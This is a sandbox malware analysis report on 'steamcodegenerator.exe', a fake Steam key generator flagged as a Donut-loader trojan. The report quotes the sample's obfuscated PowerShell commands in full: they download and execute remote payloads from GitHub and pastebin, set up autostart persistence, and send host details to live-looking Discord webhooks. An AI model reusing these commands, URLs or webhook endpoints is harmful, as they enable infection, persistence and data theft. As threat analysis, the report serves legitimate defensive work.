Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
steamcodegenerator.exe

Overview

General Information

Sample name:steamcodegenerator.exe
Analysis ID:1534102
MD5:d4f1751389516a3dfac98551142cb153
SHA1:f362178e1ecd3eac536b666e89c2aa5663109116
SHA256:eb727ad773925864801802b58b3060cfb1a0c18c1be78c8f9e6fc1d2840b19af
Tags:exeNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • steamcodegenerator.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\steamcodegenerator.exe" MD5: D4F1751389516A3DFAC98551142CB153)
    • conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5144 cmdline: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5608 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 5196 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1416 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 612 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5368 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x9bca:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stm[1].txtWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x66ff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
SourceRuleDescriptionAuthorStrings
00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x66ff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x29fff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x29fff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Process Memory Space: powershell.exe PID: 4372INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x70d6a:$b1: ::WriteAllBytes(
  • 0x89ccb:$b1: ::WriteAllBytes(
  • 0xbfead:$b1: ::WriteAllBytes(
  • 0x16086e:$b1: ::WriteAllBytes(
  • 0x1bfe61:$b1: ::WriteAllBytes(
  • 0x936b:$s1: -join
  • 0x93a6:$s1: -join
  • 0x94af:$s1: -join
  • 0x94dd:$s1: -join
  • 0x9877:$s1: -join
  • 0x989a:$s1: -join
  • 0x9bd6:$s1: -join
  • 0x9bf7:$s1: -join
  • 0x9c29:$s1: -join
  • 0x9c71:$s1: -join
  • 0x9c9e:$s1: -join
  • 0x9cc5:$s1: -join
  • 0x9cf0:$s1: -join
  • 0x9d0c:$s1: -join
  • 0x9dd3:$s1: -join
  • 0xa289:$s1: -join
Process Memory Space: powershell.exe PID: 420INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x14de55:$b1: ::WriteAllBytes(
  • 0x173f4e:$b1: ::WriteAllBytes(
  • 0x70f8d:$s1: -join
  • 0x71727:$s1: -join
  • 0xf7fea:$s1: -join
  • 0xfa8ec:$s1: -join
  • 0x4d8c2:$s3: reverse
  • 0x52e59:$s3: reverse
  • 0x897d6:$s3: reverse
  • 0x89ac4:$s3: reverse
  • 0x8a1de:$s3: reverse
  • 0x8a997:$s3: reverse
  • 0x91bd0:$s3: reverse
  • 0x91fea:$s3: reverse
  • 0x92b72:$s3: reverse
  • 0x9381f:$s3: reverse
  • 0xb8f6f:$s3: reverse
  • 0xbe725:$s3: reverse
  • 0x18b8b9:$s3: reverse
  • 0x1924ed:$s3: reverse
  • 0x1945c0:$s3: reverse
Click to see the 1 entries
SourceRuleDescriptionAuthorStrings
amsi64_420.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_5576.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\steamcodegenerator.exe", ParentImage: C:\Users\user\Desktop\steamcodegenerator.exe, ParentProcessId: 6628, ParentProcessName: steamcodegenerator.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, ProcessId: 5144, ProcessName: powershell.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4372, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\steamcodegenerator.exe", ParentImage: C:\Users\user\Desktop\steamcodegenerator.exe, ParentProcessId: 6628, ParentProcessName: steamcodegenerator.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, ProcessId: 5144, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:53:10.691283+020028576591A Network Trojan was detected192.168.2.649983162.159.138.232443TCP
2024-10-15T15:53:18.245903+020028576591A Network Trojan was detected192.168.2.649997162.159.138.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:52:55.501300+020028576581A Network Trojan was detected192.168.2.649898162.159.138.232443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: steamcodegenerator.exeReversingLabs: Detection: 42%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49797 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49900 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49911 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49944 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49952 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49983 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49997 version: TLS 1.2
Source: steamcodegenerator.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb&& source: steamcodegenerator.exe, 00000000.00000002.3398804242.0000020C74740000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398881078.0000020C74774000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: dC:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb source: steamcodegenerator.exe, 00000000.00000002.3398804242.0000020C74740000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398881078.0000020C74774000.00000002.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C070478 FindFirstFileExW,0_2_00007FF71C070478

Networking

barindex
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.6:49898 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49983 -> 162.159.138.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49997 -> 162.159.138.232:443
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 216Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 301Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 301Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /user-attachments/files/17267811/stm.txt HTTP/1.1User-Agent: DownloaderHost: github.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135214Z&X-Amz-Expires=300&X-Amz-Signature=25afd796b2e8a581e90ca77d6c3579553f304f13e0def3361890827057d8a907&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain HTTP/1.1User-Agent: DownloaderCache-Control: no-cacheHost: objects.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 216Connection: Keep-Alive
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000004.00000002.2392788423.000001663B9CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2392788423.000001663BB02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2376546046.000001662D22A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39C74A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C72E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D18470A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000011.00000002.2874987774.000001D18470A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB8161B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt
Source: powershell.exe, 00000011.00000002.2874987774.000001D184B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000004.00000002.2376546046.000001662B951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BCED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
